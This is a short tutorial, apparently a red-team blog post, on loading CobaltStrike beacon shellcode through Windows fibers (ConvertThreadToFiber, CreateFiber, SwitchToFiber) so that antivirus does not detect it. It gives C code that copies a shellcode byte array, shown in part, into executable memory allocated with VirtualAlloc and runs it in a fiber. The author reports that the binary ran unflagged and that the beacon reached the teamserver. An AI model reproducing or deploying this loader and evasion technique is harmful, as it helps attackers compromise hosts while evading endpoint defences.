I will be presenting a tutorial on a method for embedding a CobaltStrike shell within the C programming language. I am sharing this information based on the observation that this technique offers enhanced simplicity and lower susceptibility to detection by antivirus (AV) systems
Windows Fiber
Fiber can be considered as “Lightweight Threads”, The main different between Fiber and OS Threads is that fiber is easier to be schduled. We can use windows API “ConvertThreadToFiber” for converting the current thread into a fiber. Once the fiber has been created then we can schedule it to run SwitchToFiber
#include <iostream>
#include <iostream>
#include <Windows.h>
using namespace std;
void myFunction(void* parameter) {
cout << "Fiber Created" << endl;
//Do your stuff here
cout << "Do some stuff here" << endl;
//Switch back to the main thread
SwitchToFiber(parameter);
}
int main()
{
LPVOID Context = ConvertThreadToFiber(NULL);
LPVOID myFiber = CreateFiber(0, (LPFIBER_START_ROUTINE)myFunction, Context);
//Run the fiber
SwitchToFiber(myFiber);
cout << "Exiting Fiber" << endl;
}
Weaponize Fiber
As shown above that fiber is very easy to initiate. Because of its simplicity, it is becoming the new solution to run the nasty payload by the adversaries. I am going to run my CobaltStrike payload via fiber and try to check with my antivirus.
Generate Payload
Below is the steps to generate the C payload which we will embed into the code
Select your listener and select C for the output.
#include <Windows.h>
int main()
{
//convert main thread to fiber
PVOID mainFiber = ConvertThreadToFiber(NULL);
//CobaltStrike payload
unsigned char shellcode[] = "....x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\......";
PVOID shellcodeLocation = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(shellcodeLocation, shellcode, sizeof shellcode);
//create a fiber that will execute the shellcode
PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)shellcodeLocation, NULL);
//manually schedule the fiber that will execute our shellcode
SwitchToFiber(shellcodeFiber);
return 0;
}
Run the compiled code
I am going to run my binary which contain the cobaltstrike payload in the host where AV is installed. I am going to execute where all of the below features is activated.
Executing the PE
I executed the PE using command prompt console. The PE runs smoothly without any interuption from the AV that I have.
Once the beacon conntected to the teamserver, I can do further action on the host without any detection.
Cyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis 